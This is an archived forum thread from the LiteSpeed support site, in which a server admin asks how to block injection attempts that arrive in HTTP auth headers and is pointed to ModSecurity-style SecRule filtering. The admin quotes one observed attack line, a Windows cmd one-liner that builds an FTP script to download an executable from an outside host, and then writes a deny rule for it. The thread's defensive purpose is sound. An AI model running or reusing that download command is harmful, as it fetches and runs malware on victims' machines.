LiteSpeed Support Forums

LiteSpeed Support Forums (http://www.litespeedtech.com/support/forum/index.php)
-   Install/Configuration (http://www.litespeedtech.com/support/forum/forumdisplay.php?f=11)
-   -   Filtering Hack Attempts Via Http Auth (http://www.litespeedtech.com/support/forum/showthread.php?t=4667)

kule 02-04-2011 05:40 AM
Filtering Hack Attempts Via Http Auth
 
Is there a way I can filter attempts to hack via http auth? I'm getting http auth requests which are trying to use SQL Injection with the login/username.

It's not getting anywhere but I would like to stop the request before it reaches the application if possible? I tried using SecFilter but that doesn't seem to stop it (I assume that it's just looking at the actual request string rather than the http auth details)

EDIT: Apologies, feel free to move this in to general. I didn't mean to put this in Features/Feedback

mistwang 02-04-2011 09:47 AM
what secfilter rule you used? it should work, it can match pattern against any http request header.

kule 02-05-2011 12:24 AM
I was using

SecFilter "rewetsr"

This is the command that was coming through (after a load of unicode characters):

cmd /c echo open 1.1.1.1 21 > o&echo user 1 1 >> o &echo get rewetsr.exe >> o &echo quit >> o &ftp -n -s'

mistwang 02-08-2011 08:30 AM
use SecFilterSelective or new "SecRule" directive.

kule 02-08-2011 04:28 PM
Ok so if I read this right something like:

SecRule REMOTE_USER "rewetsr" log,deny,status:403


All times are GMT -7. The time now is 04:47 AM.